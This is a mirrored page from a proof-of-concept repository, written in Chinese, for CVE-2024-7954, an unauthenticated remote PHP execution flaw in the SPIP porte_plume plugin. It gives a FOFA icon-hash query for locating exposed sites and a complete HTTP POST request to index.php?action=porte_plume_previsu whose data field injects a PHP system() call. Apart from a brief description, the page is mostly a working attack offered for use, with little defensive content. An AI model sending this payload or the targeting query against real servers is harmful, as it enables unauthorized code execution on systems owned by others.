admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-11-06 02:46:33 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/SPIP/SPIP插件porte_plume存在任意PHP执行漏洞(CVE-2024-7954).md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

31 lines
1.1 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# SPIP插件porte_plume存在任意PHP执行漏洞(CVE-2024-7954)
# 一、漏洞简介
SPIP 4.30-alpha2、4.2.13、4.1.16之前的版本使用的porte_plume插件存在任意代码执行漏洞远程未经身份验证的攻击者可以通过发送精心设计的HTTP 请求以SPIP用户身份执行任意PHP代码。
# 二、影响版本
SPIP插件porte_plume
# 三、资产测绘
+ fofa`icon_hash=="-1224668706"`
+ 特征
![1725074957647-c35def1f-98a2-4638-8491-08b2d4d9feef.png](./img/MgI_aUY7wIBqRyz7/1725074957647-c35def1f-98a2-4638-8491-08b2d4d9feef-386188.png)
# 四、漏洞复现
```java
POST /index.php?action=porte_plume_previsu HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
data=AA_[<img111111>->URL`<?php system("id");?>`]_BB
```
![1724987402306-140c705e-9e86-409c-a1d9-55ba7910f820.png](./img/MgI_aUY7wIBqRyz7/1724987402306-140c705e-9e86-409c-a1d9-55ba7910f820-580953.png)
> 更新: 2024-09-05 23:21:35
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gzh7mvbhub0l35ct>
Reference in New Issue View Git Blame Copy Permalink